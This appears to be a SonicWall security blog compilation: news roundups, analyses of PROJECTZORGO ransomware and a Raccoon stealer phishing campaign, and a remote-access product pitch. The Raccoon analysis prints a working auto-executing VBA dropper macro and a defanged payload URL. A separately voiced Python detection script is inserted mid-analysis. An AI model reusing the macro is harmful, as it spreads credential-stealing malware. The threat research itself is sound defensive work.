  • Learning about cybersecurity has never been more important — but with an abundance of styles and modules to choose from, it’s also never been easier.

Cyber-spies seek coronavirus vaccine secrets — BBC

  • The U.S. has seen foreign spy agencies carry out reconnaissance of research into a coronavirus vaccine, a senior U.S. intelligence official told the BBC — and similar reports have come from the UK as well.

Healthcare Targeted By More Attacks But Less Sophistication — Dark Reading

  • An increase in attacks targeting healthcare organizations suggests that perhaps new cybercriminals are getting into the game.

Sodinokibi, Ryuk ransomware drive up average ransom to $111,000 — Bleeping Computer

  • The first quarter of the year saw a 33% increase of the average amount ransomware operators demand from their victims compared to the previous quarter.

LockBit, the new ransomware for hire: a sad and cautionary tale — Ars Technica

  • A ransomware infection involving a recent strain called LockBit ransacked one company’s poorly secured network in a matter of hours, leaving leaders no viable choice other than to pay the ransom.

New Kaiji Botnet Targets IoT, Linux Devices — Threat Post

  • The botnet uses SSH brute-force attacks to infect devices and a custom implant written in the Go Language.

Phishing Attacks Against Banks Jump With Pandemic Used as Lure — Bloomberg

  • Cyber-attacks trying to trick bank employees into clicking on malicious links jumped in the first quarter, with criminals attempting to take advantage of fear and confusion caused by the coronavirus pandemic, Bloomberg reports.

SilverTerrier BEC scammers target US govt healthcare agencies — Bleeping Computer

  • Government healthcare agencies, COVID-19 response organizations, and medical research facilities from across the globe were the targets of Business Email Compromise (BEC) phishing campaigns coordinated by multiple Nigerian BEC actors during the last three months.

In Case You Missed It

Projectzorgo ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of PROJECTZORGO ransomware [PROJECTZORGO.RSM] actively spreading in the wild.

The PROJECTZORGO ransomware was specially designed by a team of underground hackers with malicious intent. The ransomware encrypts the victim’s files with a strong encryption algorithm and holds them until the victim pays a fee to get them back.

This cyber-criminal group has been active since November 2019 based on their Twitter account.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\TXT
      • Instruction for recovery
    • %App.path%\[Name].<Projectzorgo>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Projectzorgo] extension to each encrypted file’s name. It targets a wide range of file formats, such as .exe, .jpeg, .docx, .mp3, .pdf and .html, rendering those files unusable.

After encrypting all personal documents, the ransomware displays the following text file, which states that the computer has been encrypted and instructs the victim to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: PROJECTZORGO.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Latest variant v1.5 of Raccoon stealer used in COVID-19 phishing campaign

The SonicWall Capture Labs Threat Research team has come across a new variant of Raccoon stealer (v1.5) that was used in a malicious COVID-19 campaign. While we wear masks to defend against the coronavirus, a bandit-masked raccoon seeks to take advantage of the outbreak.

Infection Cycle

As with several other attacks, this campaign starts with a phishing email pretending to contain information on how to deal with the outbreak of Covid-19. To find more details, it encourages the user to open the attached file “COVID-19 stop.zip”.

The attached ZIP archive contains a Microsoft Word document in Office Open XML format. On opening the document, the text below is shown, attempting to deceive the user into enabling editing and allowing content, supposedly to update Windows and repair the application.

This document contains embedded malicious macro code that executes once macro content is enabled. The VBA project is password-protected in an effort to bypass detection and thwart analysis.

The VBAProject contains the following modules.

VBA Module1 creates a folder named NTcore and a batch file named easy.cmd inside it.
Attribute VB_Name = "Module1"
Public obj3
Public Sub App_Hard_Wait_DoEvents(dblSeconds As Double)
If dblSeconds = 0 Then Exit Sub
Dim varStart As Variant
varStart = Timer
Do While Timer < (varStart + dblSeconds)
DoEvents
Loop
Resolution6
With Application
.ScreenUpdating = False
'Loop Through open documents
Do Until .Documents.Count = 0
'Close no save
Resolution8
.Documents(1).Close SaveChanges:=wdDoNotSaveChanges
Loop
'Quit Word no save
.Quit SaveChanges:=wdDoNotSaveChanges
End With
End Sub
Sub SetIndentLevel()
Selection.Range.Paragraphs.Alignment = Word.WdParagraphAlignment.wdAlignParagraphLeft
Selection.Range.Paragraphs.LeftIndent = Application.InchesToPoints(4.5)
End Sub
Public Function MakeFolder(ByVal pathToCreate As String) _
As Boolean
Dim sSomePath As String
Dim bAns As Boolean
sSomePath = pathToCreate
If CreatePath(sSomePath) = True Then
bAns = True
Else
bAns = False
End If
MakeFolder = bAns
End Function
Private Function CreatePath(NewPath) As Boolean
Dim sPath As String
'Add a trailing slash if none
sPath = NewPath & IIf(Right$(NewPath, 1) = "\", "", "\")
'Call API
If MakeSureDirectoryPathExists(sPath) <> 0 Then
Dim hExportFile, nWritten
Dim stringToWrite As String
hExportFile = CreateFile("c:\NTcore\easy.cmd" _
, GENERIC_WRITE _
, 0 _
, 0 _
, OPEN_ALWAYS _
, FILE_ATTRIBUTE_NORMAL _
, 0 _
)
stringToWrite = Sample1.Label1.Caption
stringToWrite = stringToWrite & Sample1.Label2.Caption
stringToWrite = stringToWrite & Sample1.Label3.Caption
stringToWrite = stringToWrite & Sample1.Label4.Caption
stringToWrite = stringToWrite & Sample1.Label5.Caption
stringToWrite = stringToWrite & Sample1.Label6.Caption
stringToWrite = stringToWrite & Sample1.Label7.Caption
stringToWrite = stringToWrite & Sample1.Label8.Caption
WriteFile hExportFile, ByVal stringToWrite, Len(stringToWrite), nWritten, 0
CloseHandle hExportFile
Call App_Hard_Wait_DoEvents(3)
'No errors, return True
CreatePath = True
End If
End Function
Sub autoopen()
On Error Resume Next
SetIndentLevel
MakeFolder Chr(99) + Chr(58) + Chr(92) + Chr(78) + Chr(84) + Chr(99) + Chr(111) + Chr(114) + Chr(101)
End Sub

VBA Module3 runs the batch file "easy.cmd".

Attribute VB_Name = "Module3"
Public Const GENERIC_WRITE = &H40000000
Public Const OPEN_ALWAYS = 4
Public Const FILE_ATTRIBUTE_NORMAL = &H80
#If VBA7 Then
Public Declare PtrSafe Function WriteFile Lib "kernel32 " ( _
ByVal hFile As LongPtr, _
lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As LongPtr, _
lpNumberOfBytesWritten As LongPtr, _
ByVal lpOverlapped As LongPtr) As LongPtr
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib _
"IMAGEHLP.DLL " (ByVal DirPath As String) As LongPtr
Public Declare PtrSafe Function CreateFile Lib "kernel32 " Alias "CreateFileA" ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As LongPtr, _
ByVal dwShareMode As LongPtr, _
ByVal lpSecurityAttributes As LongPtr, _
ByVal dwCreationDisposition As LongPtr, _
ByVal dwFlagsAndAttributes As LongPtr, _
ByVal hTemplateFile As LongPtr) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32 " (ByVal hObject As LongPtr) As LongPtr
#Else
Public Declare Function WriteFile Lib "kernel32 " ( _
ByVal hFile As Long, _
lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As Long, _
lpNumberOfBytesWritten As Long, _
ByVal lpOverlapped As Long) As Long
Public Declare Function MakeSureDirectoryPathExists Lib _
"IMAGEHLP.DLL " (ByVal DirPath As String) As Long
Public Declare Function CreateFile Lib "kernel32 " Alias "CreateFileA" ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, _
ByVal dwShareMode As Long, _
ByVal lpSecurityAttributes As Long, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As Long
Public Declare Function CloseHandle Lib "kernel32 " (ByVal hObject As Long) As Long
obj3.Run "c:\NTcore\easy.cmd", 0

The batch file "easy.cmd" generates a VB script called MMC.vbs and then runs that script to download the malicious payload "ppdls.exe" from "hxxp://taterbugfarm.com/license.exe".
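The macro above combines several traits an analyst looks for in a dropper: an AutoOpen entry point, On Error Resume Next, Win32 file APIs declared from kernel32, a target path assembled from Chr() calls, and a .Run call on the written batch file. The following Python helper is an added example (not SonicWall's code and not part of this write-up) that scans extracted VBA source, such as the text olevba prints, for those traits and rebuilds the Chr() chains so the hidden path is visible. The SAMPLE_VBA text is a constructed excerpt in the shape of the macro above, not the full document macro; the indicator names and the score threshold are this example's own choices.

```python
import re
from typing import Dict, List

# Constructed sample for this example: a few lines shaped like the macro
# analysed above (AutoOpen entry, Chr() string building, kernel32 file API
# declarations, a .Run call). It is not the document's full macro.
SAMPLE_VBA = r'''
Attribute VB_Name = "Module1"
Sub autoopen()
On Error Resume Next
SetIndentLevel
MakeFolder Chr(99) + Chr(58) + Chr(92) + Chr(78) + Chr(84) + Chr(99) + Chr(111) + Chr(114) + Chr(101)
End Sub
Private Function CreatePath(NewPath) As Boolean
If MakeSureDirectoryPathExists(sPath) <> 0 Then
hExportFile = CreateFile("c:\NTcore\easy.cmd", GENERIC_WRITE, 0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
End If
End Function
Public Declare PtrSafe Function CreateFile Lib "kernel32 " Alias "CreateFileA" (ByVal lpFileName As String) As LongPtr
Public Declare PtrSafe Function WriteFile Lib "kernel32 " (ByVal hFile As LongPtr) As LongPtr
obj3.Run "c:\NTcore\easy.cmd", 0
'''

# Each indicator is tied to a behaviour named in the analysis above.
# The names are this example's own; they are not a SonicWall signature.
INDICATORS = {
    "auto_exec": re.compile(
        r"\b(Sub|Function)\s+(autoopen|auto_open|document_open|workbook_open)\b", re.I),
    "win32_file_api": re.compile(
        r"\bDeclare\b.*\b(CreateFile|WriteFile|CloseHandle)\b", re.I),
    "dir_create_api": re.compile(r"\bMakeSureDirectoryPathExists\b", re.I),
    # three or more Chr(n) calls joined by + or &: a string hidden from plain view
    "chr_obfuscation": re.compile(r"(?:Chr\(\d+\)\s*[+&]\s*){3,}Chr\(\d+\)", re.I),
    "shell_run": re.compile(r'\.Run\s+"[^"]+"', re.I),
    "error_suppression": re.compile(r"On Error Resume Next", re.I),
}

CHR_CALL = re.compile(r"Chr\((\d+)\)", re.I)


def decode_chr_chains(source: str) -> List[str]:
    """Rebuild every string that the macro assembles from Chr(n) + Chr(n) + ..."""
    decoded = []
    for match in INDICATORS["chr_obfuscation"].finditer(source):
        codes = [int(c) for c in CHR_CALL.findall(match.group(0))]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def scan_vba(source: str) -> Dict[str, List[str]]:
    """Map each indicator name to the source fragments that triggered it."""
    hits: Dict[str, List[str]] = {}
    for name, pattern in INDICATORS.items():
        found = [m.group(0).strip() for m in pattern.finditer(source)]
        if found:
            hits[name] = found
    return hits


def triage(source: str) -> dict:
    """Summarise one VBA module: which indicators fired, decoded strings, a score."""
    hits = scan_vba(source)
    score = len(hits)
    return {
        "indicators": sorted(hits),
        "decoded_strings": decode_chr_chains(source),
        "score": score,
        # Threshold is an arbitrary choice for this example, not a tuned value.
        "verdict": "suspicious" if score >= 3 else "nothing notable",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run against the constructed sample, the decoded string comes out as c:\NTcore, the folder the analysis names, and all six indicators fire. On real extractions, feed each module's text separately so the report stays attributable to one module.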

Raccoon Infostealer

The main payload "ppdls.exe" is Raccoon infostealer malware packed with Borland Delphi. This variant includes anti-debugging tricks based on checking timer ticks, but no anti-VM protections.

Once the payload is executed on the target machine, it unpacks itself in memory and performs a GET request to Google Drive to retrieve the C&C domain.

The malware then creates a machine profile and sends it as a base64-encoded string to the C&C in a POST request.

The decoded machine profile is given below.

bot_id=C744ACBE-D01A-4C98-9752-3C9954793166_g3 &
config_id=d09962d7f04c2e0bdd09e58c69dd3e16a78f4630 &
data=null

The C&C server then returns JSON containing the configuration for the Raccoon stealer to perform its tasks.

Raccoon targets a wide range of applications and requires specific libraries for each application to extract and decrypt the credentials. Those dependencies are specified as URLs; the malware downloads those DLLs and loads them.

loader_urls is not enabled here, so this sample is not used as a dropper for downloading next-stage malware payloads.

It looks in the victim’s Desktop and Recent folders for keywords specified in the mask field, such as international bank account (iba), account, cvv, cvc, credentials, passwords, and even cryptocurrency wallets such as ethereum and bitcoin. It also extracts recent files with the extensions .pdf, .txt, .rtf and .doc.

All the stolen files are then archived and posted to the C&C server as "data.zip".

The browser directory contains the extracted cookies, credentials, auto-fills and URLs. The files directory contains the files with the specified extensions from the Recent folder, plus any files containing one of the mask keywords. Because is_screen_enabled is set to 1, a screenshot of the victim machine is also attached.

The "System Info.txt" file has the following information about the victim’s machine. The Raccoon stealer version is marked as 1.5 and the build was compiled on April 13, 2020.
[Raccoon Stealer] – v1.5 Release
Build compiled on Mon Apr 13 12:44:18 2020
Launched at: 2020.05.03 – 04:05:39 GMT
Bot_ID: C744ACBE-D01A-4C98-9752-3C9954793166_gaya3
Running on a desktop
=R=A=C=C=O=O=N=
System Information:
– System Language: English
– System TimeZone: -8 hrs
– IP: X.X.X.X
– Location: XXXXXX
– ComputerName: G3
– Username: G3
– Windows version: NT 6.1
– Product name: Windows 7 Enterprise
– System arch: x64
– CPU: Intel(R) Core(TM) i7-7700 CPU @ 3.60GHz (1 cores)
– RAM: 2047 MB (1285 MB used)
– Screen resolution: 2560×1251
– Display devices:
0) VirtualBox Graphics Adapter
============

Raccoon targets the following browser applications, as references to them are found in the unpacked malware.

  • Google Chrome
  • Chromium
  • Xpom
  • Comodo
  • Amigo
  • Orbitum
  • Bromium
  • Nichrome
  • Rockmelt
  • 360Browser
  • Nichrome
  • Vivaldi
  • Opera
  • Go
  • Sputnik
  • Kometa
  • Uran
  • QIP Surf
  • Epic Privacy
  • CocCoc
  • CentBrowser
  • 7Star
  • Elements
  • TorBro
  • Suhba
  • Safer Browser
  • Mustang
  • Superbird
  • Chedot
  • Torch
  • QQ Browser
  • UC Browser

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: Covid.VBA (Trojan)
GAV: Delphi.D (Trojan)

IOC:

b8288b1a13468b71c45ba7363fbce67a9e89007d7d098910c7f63487570899af (Email)

2ec963133cf483fcbc8a6238cfac34b5390fb2a8fcec9862cc7af6cf8f79a326 (Zip)

fada93ab8496af86f141ba0670da43f388dc60483c89c795ed98ccef842400ea (Doc)

59d85aece56f4c9f4b5927a0d18d83e9c1f62477c8941dd2b5bc6c9aad01ee2e (Raccoon)

4cfada7eb51a6c0cb26283f9c86784b2b2587c59c46a5d3dc0f06cad2c55ee97 (Libs.zip)

89c049e8c3e9f0f817c8d267654f91d0a4b63635d2bfa8463ba3138e7a290dd4 (unpacked Raccoon)

This threat is also detected by SonicWALL Capture ATP w/RTDMI

Cybersecurity News & Trends – 05-01-20

This week, COVID-19 continued to be a boon for opportunistic hackers, who targeted everything from federal stimulus funds, to package recipients, to John Wick 3.


SonicWall Spotlight

Cutting Business Expenses Shouldn’t Include Cybersecurity – Channel Futures

  • HoJin Kim explains how Boundless Cybersecurity’s emphasis on scalable economics is helping companies secure their networks during the current economic downturn.

Social Distancing For IoT—No, You Aren’t Paranoid When You Say It! – PC Quest

  • Debasish Mukherjee, VP of regional sales APAC at SonicWall, discusses how the world of cybersecurity compares to the race to find a cure for the novel coronavirus.

COVID-19 Impact: Health and Wellbeing of Employees Have Taken Precedence – Arabian Reseller

  • Mohamad Abdallah, regional director for META, speaks about how COVID-19 has impacted business at SonicWall and the contingency plans the company has put into place in case the crisis persists or continues to worsen.

Cybersecurity News

Scammers pounce as stimulus checks start flowing – The Hill

  • The ongoing taxpayer stimulus is increasingly being targeted by scammers, who see the funds as easy pickings during the ongoing crisis.

FCC Only Partially Improved Its Cybersecurity Posture, GAO Says – Security Week

  • The Federal Communications Commission (FCC) has yet to fully address security weaknesses in its systems, a newly published report from the United States Government Accountability Office (GAO) reveals.

Shade Ransomware shuts down, releases 750K decryption keys – Bleeping Computer

  • The operators behind the Shade Ransomware (Troldesh) have shut down their operations, released over 750,000 decryption keys, and apologized for the harm they caused their victims.

Hackers spoof SBA to try to compromise companies’ computers – Cyberscoop

  • It isn’t just the taxpayer stimulus being targeted by bad actors—the funds distributed by the U.S. Small Business Administration to companies affected by COVID-19 are also in their crosshairs.

The Covid-19 Pandemic Reveals Ransomware’s Long Game – Wired

  • Hackers laid the groundwork months ago for attacks. Now they’re flipping the game.

Lucy malware for Android adds file-encryption for ransomware ops – Bleeping Computer

  • A threat actor focusing on Android systems has expanded their malware-as-a-service (MaaS) business with file-encrypting capabilities for ransomware operations.

COVID-19’s impact on package deliveries creates golden opportunity for scammers  – SC Magazine

  • Cybercriminals are using the disruption caused by COVID-19 to pose as delivery companies, as they attempt to swindle businesses into opening malicious emails or handing over their credentials.

Microsoft warns of malware-laced ‘John Wick 3,’ ‘Contagion’ movie torrents – Cyberscoop

  • Tens of thousands of internet users have been infected with malware as they attempt to torrent popular movies and wind up downloading more than they intended.


Why Securing Remote Work is Crucial To Ensuring Business Continuity

If you had asked them in January, most organizations would probably have said things were humming along smoothly. Economic growth was strong, and in most cases budgets and security plans were being created and carried out without any need or intention to disrupt the status quo.

Then the entire world changed.

Within the space of a couple weeks, bustling offices were deserted one by one as federal, state, provincial and local governments issued stay-at-home and shelter-in-place orders, and employees boxed up their essential belongings and became part of the rapidly expanding global remote workforce.

While these moves were necessary to stem the spread of COVID-19, the disruption that this sudden change brought with it introduced a set of problems most businesses were ill-equipped to manage.

Companies that previously felt confident in their cybersecurity strategy suddenly found that they didn’t have the capacity or licenses to secure a full-scale mobile workforce. Worse, they needed to manage employees ill-prepared for the transition, many of whom didn’t understand the additional precautions required for safe remote work.

For hackers, though, these are the salad days — and the combination of inexperienced employees and unprepared businesses has brought them out in force. According to Reuters, hacking activity targeting corporations in the U.S. and elsewhere more than doubled in March, and preliminary reports show much the same for April. These threats highlight the urgent need for scalable Secure Remote Access and VPN license capacity to handle the new influx of remote employees while offering the same level of security offered on-prem.

Greater capacity for increased security

To help small- and medium-sized businesses (SMB) handle a rapidly expanding remote workforce, SonicWall has improved the scalability of its SMA 210 and 410 appliances — the 210 can now manage up to 200 remote VPN users, and the 410 can now support 400.

Many enterprises, governments and MSSPs are facing issues with scalability, too. To handle the influx of remote users on large distributed networks, the SonicWall SMA 1000 series allows these organizations to scale up to a million remote VPN users.

To scope which SMA solution is right for your organization, review the SonicWall Secure Mobile Access data sheet.

New public cloud options for the ‘new business normal’

The remote-work revolution coincides with another major shift in how enterprises work — the ongoing cloud transformation. The benefits of moving to a public cloud are myriad — including cost savings, greater agility, maximum uptime and quick and easy deployment.

While SonicWall has long supported private clouds, such as VMware ESXi and Microsoft Hyper-V, SonicWall SMA 500v and SMA 8200v virtual appliances can now be launched on AWS or Microsoft Azure, allowing businesses to realize these benefits at a time when they may need them the most.

Protect remote workers with special offers on SMA, VPN

Right now, budget concerns are at the forefront for many businesses. To help both new and existing customers implement necessary security during this time of crisis, SonicWall has launched several new ‘Work From Home Securely’ promotions to ensure organizations can implement comprehensive security in a cost-effective way.

With SonicWall’s new Work From Home Securely special offers on SMA and other solutions, there’s never been a better time — or a more crucial time — to secure your remote workforce.